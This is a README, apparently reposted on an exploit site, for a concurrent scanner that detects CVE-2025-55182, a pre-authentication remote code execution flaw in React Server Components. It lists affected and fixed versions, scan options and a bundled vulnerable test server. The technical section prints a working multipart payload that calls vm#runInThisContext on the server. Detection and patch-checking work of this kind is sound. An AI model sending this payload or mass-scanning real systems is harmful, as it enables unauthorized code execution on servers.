Share
## https://sploitus.com/exploit?id=7730813A-320D-5555-A85C-FE2367117D3D
# CVE-2025-55182 Scanner

Fast, concurrent vulnerability scanner for **CVE-2025-55182** - a critical (CVSS 10.0) pre-authentication Remote Code Execution vulnerability in React Server Components.

## Vulnerability Overview

**CVE-2025-55182** allows unauthenticated remote code execution by exploiting a flaw in how React decodes payloads sent to Server Function endpoints.

| | |
|---|---|
| **CVE ID** | [CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182) |
| **CVSS Score** | 10.0 CRITICAL |
| **Type** | Pre-auth Remote Code Execution |
| **Discovered by** | [Lachlan Davidson](https://github.com/lachlan2k) |
| **Disclosed** | December 3, 2025 |

### Affected Packages

- `react-server-dom-webpack` (19.0.0, 19.1.0, 19.1.1, 19.2.0)
- `react-server-dom-parcel` (19.0.0, 19.1.0, 19.1.1, 19.2.0)
- `react-server-dom-turbopack` (19.0.0, 19.1.0, 19.1.1, 19.2.0)

### Affected Frameworks

- **Next.js** - All versions using vulnerable React packages
- **React Router** - RSC APIs
- **Waku**
- **Parcel RSC** (`@parcel/rsc`)
- **Vite RSC** (`@vitejs/plugin-rsc`)
- **Redwood SDK** (`rwsdk`)

### Fixed Versions

- React: 19.0.1, 19.1.2, 19.2.1
- Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

**References:**
- [React Security Advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
- [Meta Security Advisory](https://www.facebook.com/security/advisories/cve-2025-55182)

---

## Quick Start

```bash
go build -o scanner
./scanner http://example.com
./scanner -f targets.txt -o results.json
```

## Usage

```
scanner [options] ...

Options:
  -t, --target        Target URL (repeatable)
  -f, --file         File with target URLs (one per line)
  -e, --endpoint     Custom endpoint to test (repeatable)
  -o, --output       Save results to JSON file
  --vulnerable-only        Only save vulnerable targets in output
  --timeout       Request timeout (default: 10)
  --concurrency         Concurrent requests per target (default: 10)
  --target-concurrency  Targets to scan in parallel (default: 5)
  --depth               Crawl depth for endpoint discovery (default: 2)
  --no-crawl               Skip endpoint discovery crawling
  -q, --quiet              Quiet mode - minimal output
  -v, --verbose            Verbose output

Authentication:
  --basic-auth  HTTP Basic Authentication
  --bearer          Bearer token for Authorization header
  -c, --cookie        Cookie to include (repeatable)
  -H, --header       Custom header (repeatable)
```

## Examples

```bash
# Basic scan
./scanner http://localhost:3002

# Bulk scan with output file
./scanner -f targets.txt -o results.json --no-crawl

# Fast parallel scanning
./scanner -f targets.txt --target-concurrency 20 --no-crawl -q

# With authentication
./scanner http://example.com --bearer "eyJhbGciOiJIUzI1NiIs..."
./scanner http://example.com -c "session=abc123" -H "X-API-Key: secret"
```

---

## Testing with Vulnerable Server

A vulnerable test server is included in the `testserver/` directory for validating the scanner. It simulates a Next.js application with a vulnerable RSC Server Action endpoint at `/api/rsc`.

### Option 1: Docker (Recommended)

```bash
cd testserver
docker build -t cve-2025-55182-test .
docker run -p 8888:8888 cve-2025-55182-test
```

### Option 2: Node.js Directly

```bash
cd testserver
node server.js
```

The server will start on `http://localhost:8888`.

### Running the Scanner Against Test Server

```bash
./scanner http://localhost:8888
```

**Expected output:**
```
CVE-2025-55182 Scanner
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”
Targets: 1 | Concurrency: 10 | Timeout: 10s

[1/3] Fingerprinting... Next.js
[2/3] Discovering endpoints... 0 crawled, 26 total
[3/3] Testing endpoints...

๐Ÿ”ด VULNERABLE: http://localhost:8888/api/rsc
   โ””โ”€ vm#runInThisContext (high confidence)
      โ””โ”€ vm.runInThisContext executed: 1+1=2

โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
SCAN SUMMARY
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

Targets scanned: 1
Vulnerable: 1
RSC detected: 1

โš ๏ธ  VULNERABLE TARGETS:
  โ€ข http://localhost:8888
    โ””โ”€ http://localhost:8888/api/rsc
```

---

## Safe Probes

The scanner uses **non-destructive** payloads only:

| Probe | Payload | Vulnerable Response |
|-------|---------|---------------------|
| `vm#runInThisContext` | `"1+1"` | Returns `"2"` |
| `fs#existsSync` | `"/tmp/..."` | Returns `true` or `false` |
| `util#constructor` | `[]` | Returns object info |

These probes:
- โœ… Do not write files
- โœ… Do not execute system commands
- โœ… Do not exfiltrate data
- โœ… Do not modify server state

---

## Output Format

Results are saved as JSON:

```json
[
  {
    "target": "http://localhost:3002",
    "fingerprint": {
      "framework": "Next.js",
      "hasRsc": true,
      "indicators": ["Next.js detected"]
    },
    "endpointsTested": 26,
    "findings": [
      {
        "url": "http://localhost:3002/",
        "vulnerable": true,
        "gadgets": [
          {
            "name": "vmProbe",
            "gadgetId": "vm#runInThisContext",
            "confidence": "high",
            "evidence": ["vm.runInThisContext executed: 1+1=2"]
          }
        ]
      }
    ],
    "vulnerable": true,
    "scannedAt": "2025-12-04T12:00:00Z"
  }
]
```

---

## Building from Source

```bash
# Build for current platform
go build -o scanner

# Cross-compile for Linux
GOOS=linux GOARCH=amd64 go build -o scanner-linux

# Cross-compile for macOS
GOOS=darwin GOARCH=amd64 go build -o scanner-macos

# Cross-compile for Windows
GOOS=windows GOARCH=amd64 go build -o scanner.exe
```

---

## Technical Details

The vulnerability exists in the `requireModule` function within the React Server DOM packages. When processing Server Action payloads, React unsafely deserializes the `$ACTION_REF` field, allowing attackers to specify arbitrary `module#method` references that the server resolves and executes.

**Payload format:**
```
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"

------Boundary
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"vm#runInThisContext","bound":["1+1"]}
------Boundary--
```

**Impact:** Full server-side code execution with the privileges of the Node.js process.

---

## Disclaimer

โš ๏ธ This tool is provided for **authorized security testing only**. 

- โœ… Use on systems you own or have explicit permission to test
- โŒ Do not use for unauthorized access
- โŒ Do not deploy the test server in production or expose it to the internet

The authors are not responsible for misuse of this tool.